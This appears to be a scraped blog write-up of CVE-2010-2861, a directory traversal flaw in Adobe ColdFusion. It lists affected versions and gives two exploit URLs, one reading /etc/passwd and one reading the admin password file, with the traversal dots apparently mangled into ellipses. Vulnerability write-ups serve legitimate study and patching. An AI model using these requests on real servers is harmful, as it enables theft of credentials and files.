当前位置:网站首页>Coldfusion file read holes (CVE - 2010-2861)
Coldfusion file read holes (CVE - 2010-2861)
2022-07-31 01:52:00 【1stPeak】
Disclaimer: All my articles are for technical sharing, please do not use them illegally for other purposes, otherwise you will be responsible for the consequences.
Vulnerability description
CVE-2010-2861
Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.
A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9 that could allow unauthorized users to read arbitrary files on the server.
Vulnerability impact
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
Vulnerability recurrence
1. Direct access to http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en, you can read the file /etc/passwd
2. Read the background administrator password http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
Decrypt password
Bug fixes
Patch, upgrade version
边栏推荐
猜你喜欢
二层广播风暴(产生原因+判断+解决)
Maximum monthly salary of 20K?The average salary is nearly 10,000... What is the experience of working in a Huawei subsidiary?
CV-Model [3]: MobileNet v2
case语句的综合结果,你究竟会了吗?【Verilog高级教程】
Real-time image acquisition based on FPGA
VSCode Plugin: Nested Comments
16、注册中心-consul
ShardingJDBC使用总结
《MySQL数据库进阶实战》读后感(SQL 小虚竹)
Problems that need to be solved by the tcp framework
随机推荐
16、注册中心-consul
真正的CTO,是一个懂产品的技术人
Nacos
[1154] How to convert string to datetime
What have I experienced when I won the offer of BAT and TMD technical experts?
Programmer's debriefing report/summary
Arbitrum 专访 | L2 Summer, 脱颖而出的 Arbitrum 为开发者带来了什么?
Nacos
观察者(observer)模式(一)
Word/Excel 固定表格大小,填写内容时,表格不随单元格内容变化
Can an inexperienced college graduate switch to software testing?my real case
"Cloud native's master, master and vulgar skills" - 2022 National New College Entrance Examination Volume I Composition
静态路由+PAT+静态NAT(讲解+实验)
《云原生的本手、妙手和俗手》——2022全国新高考I卷作文
类似 MS Project 的项目管理工具有哪些
C language applet -- common classic practice questions
简易表白小页面
用户交互+格式化输出
Gateway路由的配置方式
软件测试缺陷报告---定义,组成,缺陷的生命周期,缺陷跟踪产后处理流程,缺陷跟踪处理流程,缺陷跟踪的目的,缺陷管理工具